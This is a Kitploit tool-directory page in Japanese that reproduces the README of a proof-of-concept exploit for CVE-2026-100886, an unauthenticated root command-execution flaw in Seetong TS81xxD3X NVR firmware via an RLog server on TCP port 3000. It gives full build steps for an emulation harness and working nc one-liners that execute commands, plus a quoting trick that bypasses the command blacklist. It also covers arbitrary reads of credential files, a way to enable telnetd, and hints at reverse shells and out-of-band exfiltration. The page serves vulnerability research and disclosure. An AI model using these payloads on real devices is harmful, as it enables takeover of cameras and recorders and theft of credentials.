Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
seetong-ts81xxd3x-rce — CVE-2026-100886 | 認証不要のリモートコード実行ツールキット。 | Kitploit
ツール/GitHubGitHub/heapframe/seetong-ts81xxd3x-rce
組み込みシステムセキュリティIoTセキュリティ脆弱性分析エクスプロイトリバースエンジニアリングハードウェアとIoTセキュリティバイナリ解析リモートアクセスツールファームウェア解析
GitHubheapframe/seetong-ts81xxd3x-rce

seetong-ts81xxd3x-rce

CVE-2026-100886 | 認証不要のリモートコード実行ツールキット。

5日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見るウェブサイト

PoC - RLogデバッグサーバーRCE (CVE-2026-100886)

このハーネスは、ファームウェアのlibLOG.soがTCP/3000上でRLogサーバーを起動することを実証します。コマンドディスパッチャの分析と動的テストにより、そのサーバーを介した認証不要のOSコマンド実行が実証されています。

これはqemu-arm上でファームウェア自身のlibLOG.soをロードし、TLog_Init()を呼び出します。すると実際のサーバーが0.0.0.0:3000にバインドし、どこからでも****認証なしで受信接続を受け付けます。

脆弱性

ファームウェアはTCP/3000上で認証不要のRLogコマンドサーバーを公開しています。

コマンドディスパッチャはCmdを登録し、これが攻撃者制御の入力をTLog_CMDに渡します。TLog_CMDは最終的にファームウェアのコマンド実行バックエンドを呼び出します。

したがって:

Unauthenticated TCP connection
        ↓
RLog command dispatcher
        ↓
Cmd <attacker-controlled command>
        ↓
TLog_CMD
        ↓
mysystem()
        ↓
/bin/sh
        ↓
command execution

ファイル

  • harness.c: 永続版: サーバーを起動してスリープします(実際の使用にはこちらを使用してください)
  • probe_harness.c: プローブ版: エミュレータ内部からコマンドプローブも試行します(type-byteフレーミング要件を示します)

以下のスクリプトがsysroot作成に使用するファームウェアのダウンロードがもう存在しない場合。以下のいずれかから入手できます(nvrを画像検索するだけです、このファームウェアは広く配布されています):

  • https://www.fullward.com/index.php?m=home&c=View&a=index&aid=145
  • http://en.tpsee.com/index.php?md=article&ct=lists&catid=24

これにはファームウェアv4.6.1.4-build202604241011を使用しました。他のファームウェアバージョンはまだテストされていませんが、fullwardのような下流のドロップシッパーも同様に持っています。

ビルド

ハーネスと同じディレクトリでこれを実行してください

# Download and extract toolchain
wget https://gitlab.arm.com/api/v4/projects/tooling%2Fgnu-toolchains-for-arm/packages/generic/gnu-toolchain/15.3.rel1/arm-gnu-toolchain-15.3.rel1-x86_64-arm-none-linux-gnueabihf.tar.xz
tar -xvf arm-gnu-toolchain-15.3.rel1-x86_64-arm-none-linux-gnueabihf.tar.xz

TC=$(pwd)/arm-gnu-toolchain-15.3.rel1-x86_64-arm-none-linux-gnueabihf

# Creating the sysroot
wget http://www.tpsee.com/upload/firmware/update-ts81xxd3x-v4.6.1.4-build202604241011.bin
binwalk -Me update-ts81xxd3x-v4.6.1.4-build202604241011.bin

mkdir -p sysroot
cp -a "_update-ts81xxd3x-v4.6.1.4-build202604241011.bin.extracted/_0.extracted/tmp/_rootfs.ts81xxd3x.extracted/squashfs-root/lib" sysroot/

cp "_update-ts81xxd3x-v4.6.1.4-build202604241011.bin.extracted/_0.extracted/tmp/_app.ts81xxd3x.extracted/squashfs-root/lib/libLOG.so" \
   "_update-ts81xxd3x-v4.6.1.4-build202604241011.bin.extracted/_0.extracted/tmp/_app.ts81xxd3x.extracted/squashfs-root/lib/libmysystem.so" sysroot/lib/

$TC -march=armv7-a -mthumb -mfloat-abi=soft -nostdlib -ffreestanding -fno-builtin \
    -Wl,--dynamic-linker,/lib/ld-uClibc.so.0 -Wl,-rpath,/lib -Wl,-e,_start -Wl,--export-dynamic \
    harness.c -o harness -L sysroot/lib -lc

このハーネスは、libLOG.soがedvrからインポートするシンボルのスタブ実装を提供します

実行

qemu-arm -L sysroot ./harness &
sleep 2
ss -tln | grep 3000
# -> LISTEN 0 5 0.0.0.0:3000 0.0.0.0:*  (qemu user-mode forwards the emulated socket to the host)

probe_harness.cからの観測出力(上記スクリプトで使用されているものではありません):

dlopen ok
TLog_Init() -> 0
--- probe port 3000 ---
connect port 3000 OK        (x5 meaning every connection accepted)
REPLY: timeout/none         (plain-text probes ignored: binary type-byte framing required)

使用

➜  seetong-ts81xxd3x-rce printf 'Cmd cat /etc/os-release > /tmp/rlog_os.txt\r\n' | nc 127.0.0.1 3000
^C% 
➜  seetong-ts81xxd3x-rce cat /tmp/rlog_os.txt 
NAME="Artix Linux"
PRETTY_NAME="Artix Linux"
ID=artix
BUILD_ID=rolling
ANSI_COLOR="38;2;23;147;209"
HOME_URL="https://artixlinux.org/"
DOCUMENTATION_URL="https://wiki.artixlinux.org/"
SUPPORT_URL="https://forum.artixlinux.org/"
BUG_REPORT_URL="https://bugs.artixlinux.org/"
PRIVACY_POLICY_URL="https://terms.artixlinux.org/docs/privacy-policy/"
LOGO=artixlinux-logo
➜  seetong-ts81xxd3x-rce 

このPoCは適切に分離していないため、qemuユーザーモードがホストのファイルシステムを共有していることによりArtix Linuxが表示されます。

コマンドディスパッチャの詳細

AI開示、以下のテキストはAI生成です

登録済みコマンド(モジュール "RLog"、LogModuleRegCmd @ 0x8f94)

コマンドハンドラ効果
StartDebug, StartLog, SetLogLevel, Help, StartAutoTest各種ログ/セルフテスト制御
GetSystemStatus, GetSystemInfo, GetSystemLog, GetSystemCfgTLog_Get*情報/設定/ログの開示
GetSystemFile [abs names]TLog_GetSystemFile (0x7a94) + TLog_SendFile (0x48f0)任意ファイル読み取り (/etc/shadow, /usr/local/etc/user.db, ...)
GetPrintfFileTLog_GetPrintfFileファイル読み取り
Cmd [System commands]TLog_CMD (0x3680)rootとしてのシェルコマンド実行
PortMap on <ip> <port> / PortMap offfcn.00008b76リバースTUNトンネル + ポート23でのtelnetd

TLog_CMD (0x3680) — リモートシェル

  • コマンドをコピー(最大48文字、; \r \nで停止)。
  • ブラックリスト = 完全一致 {vi, cd, top, if, killcmd} (strcmp) — 簡単にバイパス可能(cat、sh、クォート)。
  • バックグラウンドモードのフォーマット文字列 "%s -b" → sh -c経由で実行。
  • Killヘルパー文字列: ps -ef | grep "sh -c %s" |grep -v grep、'{print $1}' | xargs kill -9。
  • 実行バックエンド: mysystem() (libmysystem.so) → **/usr/sbin/systemd**へのIPC(偽のsystemd、rootとして/bin/sh経由で実行; 文字列 "[systemd cmd:]%s"、"[systemd ret:]%d")。

ブラックリストのデモ(2026-08-04、エミュレートされたサーバー):

Cmd vi > /tmp/bl_vi                → dropped (no file created)
Cmd cat /etc/hostname > /tmp/bl_cat → executed (file contains hostname)
Cmd v''i > /tmp/bl_bypass          → BLACKLIST BYPASSED (shell sees `vi`, strcmp sees `v''i`)

PortMapハンドラ (fcn.00008b76) — トンネル + telnet

  • PortMap on <ip> <port>を解析(3フィールドを期待)。
  • portmap_client_start(ip, port) (0x88b0):
    • system("lsmod | grep -q '^tun\\b' || insmod /config/modules/4.9.84/tun.ko")
    • /dev/net/tunを開き、インターフェース**tps0**を作成、ifconfig tps0 up
    • /mnt/nand/yun_id.txt、/etc/product_type.txtを読み取り
    • 成功時: system("touch /usr/local/etc/normal_telnet") (0x897e→0x8982)
  • ハンドラはその後system("killall telnetd") (0x8c1e) と system("telnetd -p 23 &") (0x8c32) を実行。
  • portmap_client_stop (0x8a48) → system("rm -f /usr/local/etc/normal_telnet")、ifconfig tps0 down。
  • 関連エクスポート: portmap_client_get_status、portmap_client_is_running、portmap_client_get_assigned_ip。
  • ログ文字列: "usage: PortMap on <ip> <port> | PortMap off\n"、"PortMap on: IP=%s, Port=%d\n"、"PortMap start success! ret:%d"、"PortMap stop success!"。

その他の注目すべき文字列

  • "rm %s/* -rf" (0xad10) — ログディレクトリのクリーンアップ (TLog_DeleteLogFile) で使用。

動的検証(2026-08-04)

ハーネス(harness.c)はlibLOG.soをdlopenし、そのedvrインポートをスタブし、TLog_Init()を呼び出します:

dlopen ok
TLog_Init() -> 0

ホスト側(qemuユーザーモードのソケットパススルー):

LISTEN  0  5  0.0.0.0:3000  0.0.0.0:*  users:(("qemu-arm",pid=...,fd=0))

コマンド実行の証明(プレーンテキスト、認証なし):

$ printf 'Cmd touch /tmp/rlog_pwned\r\n' | nc <target> 3000        # file created
$ printf 'Cmd id > /tmp/rlog_id.txt\r\n' | nc <target> 3000      # id output captured

両方ともエミュレートされたサーバーで検証済み。コマンドはmysystem() → /usr/sbin/systemd → /bin/sh(デバイス上ではroot)経由で実行されます。ソケット上で出力は返されません(ブラインドRCE; 帯域外の持ち出し、例えばCmd cat /usr/local/etc/user.db > /mnt/...やリバースシェルを使用してください)。

影響: 認証されていないネットワーク攻撃者は誰でもrootとしてシェルコマンドを実行し、任意のファイル(平文パスワードDBやパスワードが漏洩するログを含む)を読み取り、telnetをポート23に切り替えることができます。LAN上ではこれで終わりです。インターネットに公開されたユニットでも同様です。

ツールをダウンロード